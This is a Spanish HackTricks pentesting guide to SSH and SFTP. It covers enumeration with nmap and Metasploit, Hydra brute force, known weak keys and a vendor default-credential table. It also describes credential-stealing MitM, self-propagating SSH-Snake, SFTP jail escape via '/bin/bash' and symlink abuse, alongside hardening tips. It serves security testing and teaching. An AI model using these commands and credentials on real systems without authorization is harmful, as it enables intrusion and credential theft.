# 22 - Pentesting SSH/SFTP
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)! Otras formas de apoyar a HackTricks: * Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com) * Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Si estás interesado en una **carrera de hacking** y hackear lo inhackeable - **¡estamos contratando!** (_se requiere polaco fluido escrito y hablado_). {% embed url="https://www.stmcyber.com/careers" %} ## Información Básica **SSH o Secure Shell o Secure Socket Shell,** es un protocolo de red que proporciona a los usuarios una **forma segura de acceder a una computadora a través de una red no segura.** **Puerto predeterminado:** 22 ``` 22/tcp open ssh syn-ack ``` **Servidores SSH:** * [openSSH](http://www.openssh.org) – OpenBSD SSH, incluido en BSD, distribuciones de Linux y Windows desde Windows 10 * [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) – Implementación de SSH para entornos con recursos limitados de memoria y procesador, incluido en OpenWrt * [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) – Implementación de SSH para Windows, el cliente es comúnmente utilizado pero el uso del servidor es más raro * [CopSSH](https://www.itefix.net/copssh) – implementación de OpenSSH para Windows **Bibliotecas SSH (implementando lado servidor):** * [libssh](https://www.libssh.org) – biblioteca C multiplataforma que implementa el protocolo SSHv2 con enlaces en [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) y [R](https://github.com/ropensci/ssh); es utilizada por KDE para sftp y por GitHub para la infraestructura SSH de git * [wolfSSH](https://www.wolfssl.com/products/wolfssh/) – biblioteca de servidor SSHv2 escrita en ANSI C y dirigida a entornos embebidos, RTOS y con restricciones de recursos * [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) – La biblioteca java Apache SSHD se basa en Apache MINA * [paramiko](https://github.com/paramiko/paramiko) – biblioteca de protocolo SSHv2 para Python ## Enumeración ### Captura de Banner ```bash nc -vn 22 ``` ### Auditoría automatizada de ssh-audit ssh-audit es una herramienta para la auditoría de configuración de servidores y clientes SSH. [https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) es un fork actualizado de [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) **Características:** * Soporte de servidor para protocolos SSH1 y SSH2; * analizar la configuración del cliente SSH; * capturar banner, reconocer dispositivo o software y sistema operativo, detectar compresión; * recopilar algoritmos de intercambio de claves, host-key, cifrado y códigos de autenticación de mensajes; * mostrar información de algoritmos (disponible desde, eliminado/deshabilitado, inseguro/débil/legado, etc.); * mostrar recomendaciones de algoritmos (añadir o eliminar basado en la versión de software reconocida); * mostrar información de seguridad (problemas relacionados, lista de CVE asignados, etc.); * analizar la compatibilidad de la versión SSH basada en la información de algoritmos; * información histórica de OpenSSH, Dropbear SSH y libssh; * funciona en Linux y Windows; * sin dependencias ```bash usage: ssh-audit.py [-1246pbcnjvlt] -1, --ssh1 force ssh version 1 only -2, --ssh2 force ssh version 2 only -4, --ipv4 enable IPv4 (order of precedence) -6, --ipv6 enable IPv6 (order of precedence) -p, --port= port to connect -b, --batch batch output -c, --client-audit starts a server on port 2222 to audit client software config (use -p to change port; use -t to change timeout) -n, --no-colors disable colors -j, --json JSON output -v, --verbose verbose output -l, --level= minimum output level (info|warn|fail) -t, --timeout= timeout (in seconds) for connection and reading (default: 5) $ python3 ssh-audit ``` [Véalo en acción (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp) ### Clave pública SSH del servidor ```bash ssh-keyscan -t rsa -p ``` ### Algoritmos de Cifrado Débiles Esto se descubre por defecto con **nmap**. Pero también puedes usar **sslcan** o **sslyze**. ### Scripts de Nmap ```bash nmap -p22 -sC # Send default nmap scripts for SSH nmap -p22 -sV # Retrieve version nmap -p22 --script ssh2-enum-algos # Retrieve supported algorythms nmap -p22 --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys nmap -p22 --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods ``` ### Shodan * `ssh` ## Fuerza bruta de nombres de usuario, contraseñas y claves privadas ### Enumeración de Nombres de Usuario En algunas versiones de OpenSSH puedes realizar un ataque de temporización para enumerar usuarios. Puedes usar un módulo de metasploit para explotar esto: ``` msf> use scanner/ssh/ssh_enumusers ``` ### [Fuerza bruta](../generic-methodologies-and-resources/brute-force.md#ssh) Algunas credenciales ssh comunes [aquí](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt) y [aquí](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) y a continuación. ### Fuerza bruta de clave privada Si conoces algunas claves privadas ssh que podrían usarse... intentémoslo. Puedes usar el script de nmap: ``` https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html ``` O el módulo auxiliar de MSF: ``` msf> use scanner/ssh/ssh_identify_pubkeys ``` O utiliza `ssh-keybrute.py` (nativo de python3, ligero y con algoritmos heredados habilitados): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). #### Las malas claves conocidas se pueden encontrar aquí: {% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %} #### Claves SSH débiles / PRNG predecible de Debian Algunos sistemas tienen fallos conocidos en la semilla aleatoria utilizada para generar material criptográfico. Esto puede resultar en un espacio de claves drásticamente reducido que puede ser forzado bruscamente. Conjuntos pregenerados de claves generadas en sistemas Debian afectados por PRNG débil están disponibles aquí: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh). Debes buscar aquí para encontrar claves válidas para la máquina víctima. ### Kerberos **crackmapexec** utilizando el protocolo `ssh` puede usar la opción `--kerberos` para **autenticarse vía kerberos**.\ Para más información ejecuta `crackmapexec ssh --help`. ## Credenciales Predeterminadas | **Proveedor** | **Nombres de usuario** | **Contraseñas** | | ------------- | ------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | APC | apc, device | apc | | Brocade | admin | admin123, password, brocade, fibranne | | Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme | | Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler | | D-Link | admin, user | private, admin, user | | Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin | | EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc | | HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc\_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC\_op, !manage, !admin | | Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 | | IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer | | Juniper | netscreen | netscreen | | NetApp | admin | netapp123 | | Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle | | VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default | ## SSH-MitM Si estás en la misma red local que la víctima que va a conectarse al servidor SSH utilizando nombre de usuario y contraseña, podrías intentar **realizar un ataque MitM para robar esas credenciales:** **Camino del ataque:** * el tráfico del usuario se redirige a la máquina atacante * el atacante monitorea los intentos de conexión al servidor SSH y los redirige a su propio servidor SSH * el servidor SSH del atacante está configurado, en primer lugar, para registrar todos los datos ingresados, incluyendo la contraseña del usuario, y en segundo lugar, enviar comandos al servidor SSH legítimo al que el usuario quiere conectarse, para ejecutarlos, y luego devolver los resultados al usuario legítimo [**SSH MITM**](https://github.com/jtesta/ssh-mitm) hace exactamente lo que se describe arriba. Para capturar y realizar el MitM real podrías usar técnicas como ARP spoofing, DNS spoofing u otras descritas en los [**Ataques de Spoofing de Red**](../generic-methodologies-and-resources/pentesting-network/#spoofing). ## SSH-Snake Si quieres atravesar una red utilizando claves privadas SSH descubiertas en sistemas, utilizando cada clave privada en cada sistema para nuevos hosts, entonces [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) es lo que necesitas. SSH-Snake realiza las siguientes tareas automáticamente y de manera recursiva: 1. En el sistema actual, encuentra cualquier clave privada SSH, 2. En el sistema actual, encuentra cualquier host o destino (usuario@host) que pueda aceptar las claves privadas, 3. Intenta conectarse por SSH a todos los destinos utilizando todas las claves privadas descubiertas, 4. Si se conecta exitosamente a un destino, repite los pasos del #1 al #4 en el sistema conectado. Es completamente auto-replicante y auto-propagante -- y completamente sin archivos. ## Configuraciones Erróneas ### Inicio de sesión como root Por defecto, la mayoría de las implementaciones de servidores SSH permitirán el inicio de sesión como root, se recomienda deshabilitarlo porque si las credenciales de esta cuenta se filtran, los atacantes obtendrán privilegios administrativos directamente y esto también permitirá a los atacantes realizar ataques de fuerza bruta en esta cuenta. **Cómo deshabilitar el inicio de sesión como root para openSSH:** 1. Edita la configuración del servidor SSH `sudoedit /etc/ssh/sshd_config` 2. Cambia `#PermitRootLogin yes` a `PermitRootLogin no` 3. Ten en cuenta los cambios de configuración: `sudo systemctl daemon-reload` 4. Reinicia el servidor SSH `sudo systemctl restart sshd` ### Fuerza bruta SFTP * [**Fuerza bruta SFTP**](../generic-methodologies-and-resources/brute-force.md#sftp) ### Ejecución de comandos SFTP Otra configuración errónea común de SSH se ve a menudo en la configuración de SFTP. La mayoría de las veces, cuando se crea un servidor SFTP, el administrador quiere que los usuarios tengan acceso SFTP para compartir archivos pero no para obtener un shell remoto en la máquina. Por lo tanto, piensan que crear un usuario, atribuirle un shell de marcador de posición (como `/usr/bin/nologin` o `/usr/bin/false`) y encerrarlo en una cárcel es suficiente para evitar el acceso al shell o el abuso en todo el sistema de archivos. Pero están equivocados, **un usuario puede pedir ejecutar un comando justo después de la autenticación antes de que se ejecute su comando o shell predeterminado**. Entonces, para eludir el shell de marcador de posición que negará el acceso al shell, solo tiene que pedir ejecutar un comando (por ejemplo, `/bin/bash`) antes, simplemente haciendo: ```bash ssh -v noraj@192.168.1.94 id ... Password: debug1: Authentication succeeded (keyboard-interactive). Authenticated to 192.168.1.94 ([192.168.1.94]:22). debug1: channel 0: new [client-session] debug1: Requesting no-more-sessions@openssh.com debug1: Entering interactive session. debug1: pledge: network debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0 debug1: Sending command: id debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0 uid=1000(noraj) gid=100(users) groups=100(users) debug1: channel 0: free: client-session, nchannels 1 Transferred: sent 2412, received 2480 bytes, in 0.1 seconds Bytes per second: sent 43133.4, received 44349.5 debug1: Exit status 0 $ ssh noraj@192.168.1.94 /bin/bash ``` Aquí hay un ejemplo de configuración segura de SFTP (`/etc/ssh/sshd_config` – openSSH) para el usuario `noraj`: ``` Match User noraj ChrootDirectory %h ForceCommand internal-sftp AllowTcpForwarding no PermitTunnel no X11Forwarding no PermitTTY no ``` Esta configuración permitirá solo SFTP: deshabilitando el acceso a la shell forzando el comando de inicio y deshabilitando el acceso TTY, pero también deshabilitando todo tipo de reenvío de puertos o túneles. ### Túnel SFTP Si tienes acceso a un servidor SFTP, también puedes tunelizar tu tráfico a través de este, por ejemplo, utilizando el reenvío de puertos común: ```bash sudo ssh -L :: -N -f @ ``` ### SFTP Symlink El **sftp** tiene el comando "**symlink**". Por lo tanto, si tienes **derechos de escritura** en alguna carpeta, puedes crear **symlinks** de **otros directorios/archivos**. Como probablemente estés **atrapado** dentro de un chroot, esto **no será especialmente útil** para ti, pero, si puedes **acceder** al **symlink** creado desde un **servicio sin chroot** (por ejemplo, si puedes acceder al symlink desde la web), podrías **abrir los archivos enlazados a través de la web**. Por ejemplo, para crear un **symlink** de un nuevo archivo **"**_**froot**_**" a "**_**/**_**"**: ```bash sftp> symlink / froot ``` Si puedes acceder al archivo "_froot_" a través de la web, podrás listar la carpeta raíz ("/") del sistema. ### Métodos de autenticación En entornos de alta seguridad es una práctica común habilitar solo la autenticación basada en clave o la autenticación de dos factores en lugar de la autenticación simple basada en contraseña. Pero a menudo, los métodos de autenticación más fuertes se habilitan sin deshabilitar los más débiles. Un caso frecuente es habilitar `publickey` en la configuración de openSSH y establecerlo como el método predeterminado, pero sin deshabilitar `password`. Así que utilizando el modo detallado del cliente SSH, un atacante puede ver que un método más débil está habilitado: ```bash ssh -v 192.168.1.94 OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019 ... debug1: Authentications that can continue: publickey,password,keyboard-interactive ``` Por ejemplo, si se establece un límite de fallos de autenticación y nunca tienes la oportunidad de llegar al método de contraseña, puedes usar la opción `PreferredAuthentications` para forzar el uso de este método. ```bash ssh -v 192.168.1.94 -o PreferredAuthentications=password ... debug1: Next authentication method: password ``` Revisar la configuración del servidor SSH es necesario para verificar que solo los métodos esperados estén autorizados. Utilizar el modo detallado en el cliente puede ayudar a ver la efectividad de la configuración. ### Archivos de configuración ```bash ssh_config sshd_config authorized_keys ssh_known_hosts known_hosts id_rsa ``` ## Fuzzing * [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt) * [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh\_version\_2) ## Referencias * Puedes encontrar guías interesantes sobre cómo reforzar SSH en [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html) * [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide) Si estás interesado en una **carrera en hacking** y hackear lo inhackeable - **¡estamos contratando!** (_se requiere polaco fluido escrito y hablado_). {% embed url="https://www.stmcyber.com/careers" %} ## Comandos Automáticos HackTricks ``` Protocol_Name: SSH Port_Number: 22 Protocol_Description: Secure Shell Hardening Entry_1: Name: Hydra Brute Force Description: Need Username Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh Entry_2: Name: consolesless mfs enumeration Description: SSH enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit' ```
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)! Otras formas de apoyar a HackTricks: * Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! * Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com) * Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos * **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue**me en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).